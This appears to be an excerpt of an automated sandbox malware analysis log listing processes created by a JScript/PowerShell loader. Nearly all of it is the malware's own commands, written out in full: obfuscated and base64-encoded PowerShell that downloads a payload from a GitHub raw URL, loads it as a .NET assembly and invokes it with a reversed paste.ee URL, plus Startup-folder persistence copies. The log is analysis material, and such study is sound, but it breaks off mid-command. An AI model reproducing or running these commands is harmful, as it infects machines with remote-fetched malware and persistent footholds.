Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('CSE'+'url = '+'Kk'+'s'+'https://raw.gith'+'ubusercon'+'tent.co'+'m/No'+'DetectOn/NoDetec'+'tOn/'+'refs'+'/he'+'ads/mai'+'n/Det'+'ahNot'+'e_J.txt'+'Kk'+'s; CS'+'Ebase64'+'Cont'+'e'+'nt = '+'(N'+'ew-Ob'+'ject System.Net.WebC'+'li'+'ent).D'+'ownload'+'Str'+'ing'+'(CSEurl)'+'; CSEbinaryCo'+'ntent = '+'[System.Co'+'nvert]::'+'FromBa'+'se'+'64'+'S'+'tr'+'i'+'ng(CSEbase64Content'+');'+' CSEassem'+'bly ='+' ['+'Re'+'flect'+'io'+'n.Assembly]::Load(C'+'S'+'Ebin'+'aryConten'+'t); CSEc'+'omm'+'and = '+'K'+'k'+'s['+'dnlib.IO.H'+'om'+'e]'+'::VAI(oNI0/zbEuc'+'/d/ee.'+'e'+'tsap//:sptt'+'hoN'+'I, oNI1oN'+'I, oNIC:1'+'lpProg'+'ramD'+'ata1lpoNI, o'+'N'+'ItondinhooNI, '+'oNIA'+'ppLau'+'nchoN'+'I, o'+'NIdesativa'+'dooNI'+',oNIo'+'NI)Kks; Invoke-E'+'xpr'+'essi'+'o'+'n'+' C'+'SEcommand') -cREPlACe ([CHAr]67+[CHAr]83+[CHAr]69),[CHAr]36 -cREPlACe ([CHAr]111+[CHAr]78+[CHAr]73),[CHAr]34-cREPlACe 'Kks',[CHAr]39 -ReplAce ([CHAr]49+[CHAr]108+[CHAr]112),[CHAr]92) |iex"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wscript.exe wscript.exe "C:\Users\Public\Documents\2x_bee.js"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2x_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KAAoACcAQwBTAEUAJwArACcAdQByAGwAIAA9ACAAJwArACcASwBrACcAKwAnAHMAJwArACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAAnACsAJwB1AGIAdQBzAGUAcgBjAG8AbgAnACsAJwB0AGUAbgB0AC4AYwBvACcAKwAnAG0ALwBOAG8AJwArACcARABlAHQAZQBjAHQATwBuAC8ATgBvAEQAZQB0AGUAYwAnACsAJwB0AE8AbgAvACcAKwAnAHIAZQBmAHMAJwArACcALwBoAGUAJwArACcAYQBkAHMALwBtAGEAaQAnACsAJwBuAC8ARABlAHQAJwArACcAYQBoAE4AbwB0ACcAKwAnAGUAXwBKAC4AdAB4AHQAJwArACcASwBrACcAKwAnAHMAOwAgAEMAUwAnACsAJwBFAGIAYQBzAGUANgA0ACcAKwAnAEMAbwBuAHQAJwArACcAZQAnACsAJwBuAHQAIAA9ACAAJwArACcAKABOACcAKwAnAGUAdwAtAE8AYgAnACsAJwBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAJwArACcAbABpACcAKwAnAGUAbgB0ACkALgBEACcAKwAnAG8AdwBuAGwAbwBhAGQAJwArACcAUwB0AHIAJwArACcAaQBuAGcAJwArACcAKABDAFMARQB1AHIAbAApACcAKwAnADsAIABDAFMARQBiAGkAbgBhAHIAeQBDAG8AJwArACcAbgB0AGUAbgB0ACAAPQAgACcAKwAnAFsAUwB5AHMAdABlAG0ALgBDAG8AJwArACcAbgB2AGUAcgB0AF0AOgA6ACcAKwAnAEYAcgBvAG0AQgBhACcAKwAnAHMAZQAnACsAJwA2ADQAJwArACcAUwAnACsAJwB0AHIAJwArACcAaQAnACsAJwBuAGcAKABDAFMARQBiAGEAcwBlADYANABDAG8AbgB0AGUAbgB0ACcAKwAnACkAOwAnACsAJwAgAEMAUwBFAGEAcwBzAGUAbQAnACsAJwBiAGwAeQAgAD0AJwArACcAIABbACcAKwAnAFIAZQAnACsAJwBmAGwAZQBjAHQAJwArACcAaQBvACcAKwAnAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoAEMAJwArACcAUwAnACsAJwBFAGIAaQBuACcAKwAnAGEAcgB5AEMAbwBuAHQAZQBuACcAKwAnAHQAKQA7ACAAQwBTAEUAYwAnACsAJwBvAG0AbQAnACsAJwBhAG4AZAAgAD0AIAAnACsAJwBLACcAKwAnAGsAJwArACcAcwBbACcAKwAnAGQAbgBsAGkAYgAuAEkATwAuAEgAJwArACcAbwBtACcAKwAnAGUAXQAnACsAJwA6ADoAVgBBAEkAKABvAE4ASQAwAC8AegBiAEUAdQBjACcAKwAnAC8AZAAvAGUAZQAuACcAKwAnAGUAJwArACcAdABzAGEAcAAvAC8AOgBzAHAAdAB0ACcAKwAnAGgAbwBOACcAKwAnAEkALAAgAG8ATgBJADEAbwBOACcAKwAnAEkALAAgAG8ATgBJAEMAOgAxACcAKwAnAGwAcABQAHIAbwBnACcAKwAnAHIAYQBtAEQAJwArACcAYQB0AGEAMQBsAHAAbwBOAEkALAAgAG8AJwArACcATgAnACsAJwBJAHQAbwBuAGQAaQBuAGgAbwBvAE4ASQAsACAAJwArACcAbwBOAEkAQQAnACsAJwBwAHAATABhAHUAJwArACcAbgBjAGgAbwBOACcAKwAnAEkALAAgAG8AJwArACcATgBJAGQAZQBzAGEAdABpAHYAYQAnACsAJwBkAG8AbwBOAEkAJwArACcALABvAE4ASQBvACcAKwAnAE4ASQApAEsAawBzADsAIABJAG4AdgBvAGsAZQAtAEUAJwArACcAeABwAHIAJwArACcAZQBzAHMAaQAnACsAJwBvACcAKwAnAG4AJwArACcAIABDACcAKwAnAFMARQBjAG8AbQBtAGEAbgBkACcAKQAgAC0AYwBSAEUAUABsAEEAQwBlACAAIAAoAFsAQwBIAEEAcgBdADYANwArAFsAQwBIAEEAcgBdADgAMwArAFsAQwBIAEEAcgBdADYAOQApACwAWwBDAEgAQQByAF0AMwA2ACAALQBjAFIARQBQAGwAQQBDAGUAIAAoAFsAQwBIAEEAcgBdADEAMQAxACsAWwBDAEgAQQByAF0ANwA4ACsAWwBDAEgAQQByAF0ANwAzACkALABbAEMASABBAHIAXQAzADQALQBjAFIARQBQAGwAQQBDAGUAIAAgACcASwBrAHMAJwAsAFsAQwBIAEEAcgBdADMAOQAgACAALQBSAGUAcABsAEEAYwBlACAAKABbAEMASABBAHIAXQA0ADkAKwBbAEMASABBAHIAXQAxADAAOAArAFsAQwBIAEEAcgBdADEAMQAyACkALABbAEMASABBAHIAXQA5ADIAKQAgAHwAaQBlAHgA';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2x_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CJJ.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KAAoACcAQwBTAEUAJwArACcAdQByAGwAIAA9ACAAJwArACcASwBrACcAKwAnAHMAJwArACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAAnACsAJwB1AGIAdQBzAGUAcgBjAG8AbgAnACsAJwB0AGUAbgB0AC4AYwBvACcAKwAnAG0ALwBOAG8AJwArACcARABlAHQAZQBjAHQATwBuAC8ATgBvAEQAZQB0AGUAYwAnACsAJwB0AE8AbgAvACcAKwAnAHIAZQBmAHMAJwArACcALwBoAGUAJwArACcAYQBkAHMALwBtAGEAaQAnACsAJwBuAC8ARABlAHQAJwArACcAYQBoAE4AbwB0ACcAKwAnAGUAXwBKAC4AdAB4AHQAJwArACcASwBrACcAKwAnAHMAOwAgAEMAUwAnACsAJwBFAGIAYQBzAGUANgA0ACcAKwAnAEMAbwBuAHQAJwArACcAZQAnACsAJwBuAHQAIAA9ACAAJwArACcAKABOACcAKwAnAGUAdwAtAE8AYgAnACsAJwBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAJwArACcAbABpACcAKwAnAGUAbgB0ACkALgBEACcAKwAnAG8AdwBuAGwAbwBhAGQAJwArACcAUwB0AHIAJwArACcAaQBuAGcAJwArACcAKABDAFMARQB1AHIAbAApACcAKwAnADsAIABDAFMARQBiAGkAbgBhAHIAeQBDAG8AJwArACcAbgB0AGUAbgB0ACAAPQAgACcAKwAnAFsAUwB5AHMAdABlAG0ALgBDAG8AJwArACcAbgB2AGUAcgB0AF0AOgA6ACcAKwAnAEYAcgBvAG0AQgBhACcAKwAnAHMAZQAnACsAJwA2ADQAJwArACcAUwAnACsAJwB0AHIAJwArACcAaQAnACsAJwBuAGcAKABDAFMARQBiAGEAcwBlADYANABDAG8AbgB0AGUAbgB0ACcAKwAnACkAOwAnACsAJwAgAEMAUwBFAGEAcwBzAGUAbQAnACsAJwBiAGwAeQAgAD0AJwArACcAIABbACcAKwAnAFIAZQAnACsAJwBmAGwAZQBjAHQAJwArACcAaQBvACcAKwAnAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoAEMAJwArACcAUwAnACsAJwBFAGIAaQBuACcAKwAnAGEAcgB5AEMAbwBuAHQAZQBuACcAKwAnAHQAKQA7ACAAQwBTAEUAYwAnACsAJwBvAG0AbQAnACsAJwBhAG4AZAAgAD0AIAAnACsAJwBLACcAKwAnAGsAJwArACcAcwBbACcAKwAnAGQAbgBsAGkAYgAuAEkATwAuAEgAJwArACcAbwBtACcAKwAnAGUAXQAnACsAJwA6ADoAVgBBAEkAKABvAE4ASQAwAC8AegBiAEUAdQBjACcAKwAnAC8AZAAvAGUAZQAuACcAKwAnAGUAJwArACcAdABzAGEAcAAvAC8AOgBzAHAAdAB0ACcAKwAnAGgAbwBOACcAKwAnAEkALAAgAG8ATgBJADEAbwBOACcAKwAnAEkALAAgAG8ATgBJAEMAOgAxACcAKwAnAGwAcABQAHIAbwBnACcAKwAnAHIAYQBtAEQAJwArACcAYQB0AGEAMQBsAHAAbwBOAEkALAAgAG8AJwArACcATgAnACsAJwBJAHQAbwBuAGQAaQBuAGgAbwBvAE4ASQAsACAAJwArACcAbwBOAEkAQQAnACsAJwBwAHAATABhAHUAJwArACcAbgBjAGgAbwBOACcAKwAnAEkALAAgAG8AJwArACcATgBJAGQAZQBzAGEAdABpAHYAYQAnACsAJwBkAG8AbwBOAEkAJwArACcALABvAE4ASQBvACcAKwAnAE4ASQApAEsAawBzADsAIABJAG4AdgBvAGsAZQAtAEUAJwArACcAeABwAHIAJwArACcAZQBzAHMAaQAnACsAJwBvACcAKwAnAG4AJwArACcAIABDACcAKwAnAFMARQBjAG8AbQBtAGEAbgBkACcAKQAgAC0AYwBSAEUAUABsAEEAQwBlACAAIAAoAFsAQwBIAEEAcgBdADYANwArAFsAQwBIAEEAcgBdADgAMwArAFsAQwBIAEEAcgBdADYAOQApACwAWwBDAEgAQQByAF0AMwA2ACAALQBjAFIARQBQAGwAQQBDAGUAIAAoAFsAQwBIAEEAcgBdADEAMQAxACsAWwBDAEgAQQByAF0ANwA4ACsAWwBDAEgAQQByAF0ANwAzACkALABbAEMASABBAHIAXQAzADQALQBjAFIARQBQAGwAQQBDAGUAIAAgACcASwBrAHMAJwAsAFsAQwBIAEEAcgBdADMAOQAgACAALQBSAGUAcABsAEEAYwBlACAAKABbAEMASABBAHIAXQA0ADkAKwBbAEMASABBAHIAXQAxADAAOAArAFsAQwBIAEEAcgBdADEAMQAyACkALABbAEMASABBAHIAXQA5ADIAKQAgAHwAaQBlAHgA';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CJJ.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $eNv:cOMSPEc[4,15,25]-JoIN'')( (('{2}url = {0'+'}htt'+'ps://raw.'+'gith'+'u'+'buser'+'cont'+'ent.co'+'m/N'+'oDetec'+'tO'+'n/NoDe'+'tectOn/'+'r'+'e'+'f'+'s/'+'he'+'ads/main/D'+'et'+'ahNote_J.txt'+'{0}'+'; '+'{'+'2}bas'+'e64Co'+'n'+'ten'+'t = (New-Object'+' S'+'yst'+'em'+'.Net'+'.W'+'e'+'b'+'Clie'+'n'+'t'+').'+'D'+'ownlo'+'a'+'dSt'+'r'+'i'+'ng'+'({'+'2}url); '+'{2}bi'+'na'+'ryCon'+'tent = [S'+'ystem.'+'Conver'+'t]:'+':Fr'+'o'+'mBase64String({2}ba'+'se64'+'C'+'ont'+'ent)'+';'+' {2}'+'asse'+'m'+'b'+'ly '+'= [Ref'+'le'+'c'+'ti'+'on.Assemb'+'ly]::L'+'oa'+'d'+'({'+'2}bina'+'ry'+'C'+'ontent); {2}'+'c'+'omma'+'n'+'d ='+' {0}['+'dnlib.'+'IO.Home]::'+'V'+'AI('+'{'+'3'+'}0/'+'K'+'SAc'+'F'+'/d'+'/ee.'+'et'+'s'+'a'+'p//:spt'+'th'+'{3}'+', {3}1'+'{3}'+', {3'+'}'+'C:'+'{'+'1'+'}Pro'+'gr'+'amD'+'a'+'t'+'a{1'+'}{'+'3}, {'+'3'+'}'+'ra'+'jado'+'{3'+'}, '+'{3}Ad'+'d'+'InP'+'rocess32{3},'+' {3'+'}'+'d'+'es'+'at'+'ivado{3},'+'{3}'+'{3})'+'{'+'0}'+';'+' I'+'nvok'+'e-Ex'+'p'+'ression {2'+'}com'+'m'+'an'+'d') -F [cHar]39,[cHar]92,[cHar]36,[cHar]34) )"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('CSE'+'url = '+'Kk'+'s'+'https://raw.gith'+'ubusercon'+'tent.co'+'m/No'+'DetectOn/NoDetec'+'tOn/'+'refs'+'/he'+'ads/mai'+'n/Det'+'ahNot'+'e_J.txt'+'Kk'+'s; CS'+'Ebase64'+'Cont'+'e'+'nt = '+'(N'+'ew-Ob'+'ject System.Net.WebC'+'li'+'ent).D'+'ownload'+'Str'+'ing'+'(CSEurl)'+'; CSEbinaryCo'+'ntent = '+'[System.Co'+'nvert]::'+'FromBa'+'se'+'64'+'S'+'tr'+'i'+'ng(CSEbase64Content'+');'+' CSEassem'+'bly ='+' ['+'Re'+'flect'+'io'+'n.Assembly]::Load(C'+'S'+'Ebin'+'aryConten'+'t); CSEc'+'omm'+'and = '+'K'+'k'+'s['+'dnlib.IO.H'+'om'+'e]'+'::VAI(oNI0/zbEuc'+'/d/ee.'+'e'+'tsap//:sptt'+'hoN'+'I, oNI1oN'+'I, oNIC:1'+'lpProg'+'ramD'+'ata1lpoNI, o'+'N'+'ItondinhooNI, '+'oNIA'+'ppLau'+'nchoN'+'I, o'+'NIdesativa'+'dooNI'+',oNIo'+'NI)Kks; Invoke-E'+'xpr'+'essi'+'o'+'n'+' C'+'SEcommand') -cREPlACe ([CHAr]67+[CHAr]83+[CHAr]69),[CHAr]36 -cREPlACe ([CHAr]111+[CHAr]78+[CHAr]73),[CHAr]34-cREPlACe 'Kks',[CHAr]39 -ReplAce ([CHAr]49+[CHAr]108+[CHAr]112),[CHAr]92) |iex"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('CSE'+'url = '+'Kk'+'s'+'https://raw.gith'+'ubusercon'+'tent.co'+'m/No'+'DetectOn/NoDetec'+'tOn/'+'refs'+'/he'+'ads/mai'+'n/Det'+'ahNot'+'e_J.txt'+'Kk'+'s; CS'+'Ebase64'+'Cont'+'e'+'nt = '+'(N'+'ew-Ob'+'ject System.Net.WebC'+'li'+'ent).D'+'ownload'+'Str'+'ing'+'(CSEurl)'+'; CSEbinaryCo'+'ntent = '+'[System.Co'+'nvert]::'+'FromBa'+'se'+'64'+'S'+'tr'+'i'+'ng(CSEbase64Content'+');'+' CSEassem'+'bly ='+' ['+'Re'+'flect'+'io'+'n.Assembly]::Load(C'+'S'+'Ebin'+'aryConten'+'t); CSEc'+'omm'+'and = '+'K'+'k'+'s['+'dnlib.IO.H'+'om'+'e]'+'::VAI(oNI0/zbEuc'+'/d/ee.'+'e'+'tsap//:sptt'+'hoN'+'I, oNI1oN'+'I, oNIC:1'+'lpProg'+'ramD'+'ata1lpoNI, o'+'N'+'ItondinhooNI, '+'oNIA'+'ppLau'+'nchoN'+'I, o'+'NIdesativa'+'dooNI'+',oNIo'+'NI)Kks; Invoke-E'+'xpr'+'essi'+'o'+'n'+' C'+'SEcommand') -cREPlACe ([CHAr]67+[CHAr]83+[CHAr]69),[CHAr]36 -cREPlACe ([CHAr]111+[CHAr]78+[CHAr]73),[CHAr]34-cREPlACe 'Kks',[CHAr]39 -ReplAce ([CHAr]49+[CHAr]108+[CHAr]112),[CHAr]92) |iex"
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [system.io.file]::copy('c:\users\public\documents\2x_bee.js', 'c:\users\' + [environment]::username + ''\appdata\roaming\microsoft\windows\start menu\programs\startup\ sj.jjc.js')')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [system.io.file]::copy('c:\users\public\documents\2p_bee.js', 'c:\users\' + [environment]::username + ''\appdata\roaming\microsoft\windows\start menu\programs\startup\ sj.jjc.js')')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [system.io.file]::copy('c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\2p_bee.js', 'c:\users\' + [environment]::username + ''\appdata\roaming\microsoft\windows\start menu\programs\startup\ sj.jjc.js')')
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'lgaoacaajablae4adga6agmatwbnafmauabfagmawwa0acwamqa1acwamga1af0alqbkag8asqboaccajwapacgaiaaoacgajwb7adiafqb1ahiabaagad0aiab7adaajwaraccafqboahqadaanacsajwbwahmaogavac8acgbhahcalganacsajwbnagkadaboaccakwanahuajwaraccaygb1ahmazqbyaccakwanagmabwbuahqajwaraccazqbuahqalgbjag8ajwaraccabqavae4ajwaraccabwbeaguadablagmajwaraccadabpaccakwanag4alwboag8arablaccakwanahqazqbjahqatwbuac8ajwaraccacganacsajwblaccakwanagyajwaraccacwavaccakwanaggazqanacsajwbhagqacwavag0ayqbpag4alwbeaccakwanaguadaanacsajwbhaggatgbvahqazqbfaeoalgb0ahgadaanacsajwb7adaafqanacsajwa7acaajwaraccaewanacsajwayah0aygbhahmajwaraccazqa2adqaqwbvaccakwanag4ajwaraccadablag4ajwaraccadaagad0aiaaoae4azqb3ac0atwbiagoazqbjahqajwaraccaiabtaccakwanahkacwb0accakwanaguabqanacsajwauae4azqb0accakwanac4avwanacsajwblaccakwanagiajwaraccaqwbsagkazqanacsajwbuaccakwanahqajwaraccakqauaccakwanaeqajwaraccabwb3ag4ababvaccakwanageajwaraccazabtahqajwaraccacganacsajwbpaccakwanag4azwanacsajwaoahsajwaraccamgb9ahuacgbsackaowagaccakwanahsamgb9agiaaqanacsajwbuageajwaraccacgb5aemabwbuaccakwanahqazqbuahqaiaa9acaawwbtaccakwanahkacwb0aguabqauaccakwanaemabwbuahyazqbyaccakwanahqaxqa6accakwanadoargbyaccakwanag8ajwaraccabqbcageacwbladyanabtahqacgbpag4azwaoahsamgb9agiayqanacsajwbzaguanga0accakwanaemajwaraccabwbuahqajwaraccazqbuahqakqanacsajwa7accakwanacaaewayah0ajwaraccayqbzahmazqanacsajwbtaccakwanagiajwaraccabab5acaajwaraccapqagafsaugblagyajwaraccabablaccakwanagmajwaraccadabpaccakwanag8abgauaeeacwbzaguabqbiaccakwanagwaeqbdadoaogbmaccakwanag8ayqanacsajwbkaccakwanacgaewanacsajwayah0aygbpag4ayqanacsajwbyahkajwaraccaqwanacsajwbvag4adablag4adaapadsaiab7adiafqanacsajwbjaccakwanag8abqbtageajwaraccabganacsajwbkacaapqanacsajwagahsamab9afsajwaraccazabuagwaaqbiac4ajwaraccasqbpac4asabvag0azqbdadoaoganacsajwbwaccakwanaeeasqaoaccakwanahsajwaraccamwanacsajwb9adaalwanacsajwblaccakwanafmaqqbjaccakwanaeyajwaraccalwbkaccakwanac8azqblac4ajwaraccazqb0accakwanahmajwaraccayqanacsajwbwac8alwa6ahmacab0accakwanahqaaaanacsajwb7admafqanacsajwasacaaewazah0amqanacsajwb7admafqanacsajwasacaaewazaccakwanah0ajwaraccaqwa6accakwanahsajwaraccamqanacsajwb9afaacgbvaccakwanagcacganacsajwbhag0araanacsajwbhaccakwanahqajwaraccayqb7adeajwaraccafqb7accakwanadmafqasacaaewanacsajwazaccakwanah0ajwaraccacgbhaccakwanagoayqbkag8ajwaraccaewazaccakwanah0alaagaccakwanahsamwb9aeeazaanacsajwbkaccakwanaekabgbqaccakwanahiabwbjaguacwbzadmamgb7admafqasaccakwanacaaewazaccakwanah0ajwaraccazaanacsajwblahmajwaraccayqb0accakwanagkadgbhagqabwb7admafqasaccakwanahsamwb9accakwanahsamwb9ackajwaraccaewanacsajwawah0ajwaraccaowanacsajwagaekajwaraccabgb2ag8aawanacsajwblac0arqb4accakwanahaajwaraccacgblahmacwbpag8abgagahsamganacsajwb9agmabwbtaccakwanag0ajwaraccayqbuaccakwanagqajwapacaalqbgacaawwbjaegayqbyaf0amwa5acwawwbjaegayqbyaf0aoqayacwawwbjaegayqbyaf0amwa2acwawwbjaegayqbyaf0amwa0ackaiaapaa==';$owjuxd = [system.text.encoding]::unicode.getstring([system.convert]::fromba
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kaaoaccaqwbtaeuajwaraccadqbyagwaiaa9acaajwaraccaswbraccakwanahmajwaraccaaab0ahqacabzadoalwavahiayqb3ac4azwbpahqaaaanacsajwb1agiadqbzaguacgbjag8abganacsajwb0aguabgb0ac4aywbvaccakwanag0alwboag8ajwaraccarablahqazqbjahqatwbuac8atgbvaeqazqb0aguaywanacsajwb0ae8abgavaccakwanahiazqbmahmajwaraccalwboaguajwaraccayqbkahmalwbtageaaqanacsajwbuac8arablahqajwaraccayqboae4abwb0accakwanaguaxwbkac4adab4ahqajwaraccaswbraccakwanahmaowagaemauwanacsajwbfagiayqbzaguanga0accakwanaemabwbuahqajwaraccazqanacsajwbuahqaiaa9acaajwaraccakaboaccakwanaguadwatae8ayganacsajwbqaguaywb0acaauwb5ahmadablag0algboaguadaauafcazqbiaemajwaraccababpaccakwanaguabgb0ackalgbeaccakwanag8adwbuagwabwbhagqajwaraccauwb0ahiajwaraccaaqbuagcajwaraccakabdafmarqb1ahiabaapaccakwanadsaiabdafmarqbiagkabgbhahiaeqbdag8ajwaraccabgb0aguabgb0acaapqagaccakwanafsauwb5ahmadablag0algbdag8ajwaraccabgb2aguacgb0af0aoga6accakwanaeyacgbvag0aqgbhaccakwanahmazqanacsajwa2adqajwaraccauwanacsajwb0ahiajwaraccaaqanacsajwbuagcakabdafmarqbiageacwbladyanabdag8abgb0aguabgb0accakwanackaowanacsajwagaemauwbfageacwbzaguabqanacsajwbiagwaeqagad0ajwaraccaiabbaccakwanafiazqanacsajwbmagwazqbjahqajwaraccaaqbvaccakwanag4algbbahmacwblag0aygbsahkaxqa6adoatabvageazaaoaemajwaraccauwanacsajwbfagiaaqbuaccakwanageacgb5aemabwbuahqazqbuaccakwanahqakqa7acaaqwbtaeuaywanacsajwbvag0abqanacsajwbhag4azaagad0aiaanacsajwblaccakwanagsajwaraccacwbbaccakwanagqabgbsagkaygauaekatwauaegajwaraccabwbtaccakwanaguaxqanacsajwa6adoavgbbaekakabvae4asqawac8aegbiaeuadqbjaccakwanac8azaavaguazqauaccakwanaguajwaraccadabzageacaavac8aogbzahaadab0accakwanaggabwboaccakwanaekalaagag8atgbjadeabwboaccakwanaekalaagag8atgbjaemaogaxaccakwanagwacabqahiabwbnaccakwanahiayqbtaeqajwaraccayqb0ageamqbsahaabwboaekalaagag8ajwaraccatganacsajwbjahqabwbuagqaaqbuaggabwbvae4asqasacaajwaraccabwboaekaqqanacsajwbwahaatabhahuajwaraccabgbjaggabwboaccakwanaekalaagag8ajwaraccatgbjagqazqbzageadabpahyayqanacsajwbkag8abwboaekajwaraccalabvae4asqbvaccakwanae4asqapaesaawbzadsaiabjag4adgbvagsazqataeuajwaraccaeabwahiajwaraccazqbzahmaaqanacsajwbvaccakwanag4ajwaraccaiabdaccakwanafmarqbjag8abqbtageabgbkaccakqagac0aywbsaeuauabsaeeaqwblacaaiaaoafsaqwbiaeeacgbdadyanwarafsaqwbiaeeacgbdadgamwarafsaqwbiaeeacgbdadyaoqapacwawwbdaegaqqbyaf0amwa2acaalqbjafiarqbqagwaqqbdaguaiaaoafsaqwbiaeeacgbdadeamqaxacsawwbdaegaqqbyaf0anwa4acsawwbdaegaqqbyaf0anwazackalabbaemasabbahiaxqazadqalqbjafiarqbqagwaqqbdaguaiaagaccaswbrahmajwasafsaqwbiaeeacgbdadmaoqagacaalqbsaguacabsaeeaywblacaakabbaemasabbahiaxqa0adkakwbbaemasabbahiaxqaxadaaoaarafsaqwbiaeeacgbdadeamqayackalabbaemasabbahiaxqa5adiakqagahwaaqblahga';$owjuxd = [system.text.encoding]::unicode.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command ".( $env:comspec[4,15,25]-join'')( (('{2}url = {0'+'}htt'+'ps://raw.'+'gith'+'u'+'buser'+'cont'+'ent.co'+'m/n'+'odetec'+'to'+'n/node'+'tecton/'+'r'+'e'+'f'+'s/'+'he'+'ads/main/d'+'et'+'ahnote_j.txt'+'{0}'+'; '+'{'+'2}bas'+'e64co'+'n'+'ten'+'t = (new-object'+' s'+'yst'+'em'+'.net'+'.w'+'e'+'b'+'clie'+'n'+'t'+').'+'d'+'ownlo'+'a'+'dst'+'r'+'i'+'ng'+'({'+'2}url); '+'{2}bi'+'na'+'rycon'+'tent = [s'+'ystem.'+'conver'+'t]:'+':fr'+'o'+'mbase64string({2}ba'+'se64'+'c'+'ont'+'ent)'+';'+' {2}'+'asse'+'m'+'b'+'ly '+'= [ref'+'le'+'c'+'ti'+'on.assemb'+'ly]::l'+'oa'+'d'+'({'+'2}bina'+'ry'+'c'+'ontent); {2}'+'c'+'omma'+'n'+'d ='+' {0}['+'dnlib.'+'io.home]::'+'v'+'ai('+'{'+'3'+'}0/'+'k'+'sac'+'f'+'/d'+'/ee.'+'et'+'s'+'a'+'p//:spt'+'th'+'{3}'+', {3}1'+'{3}'+', 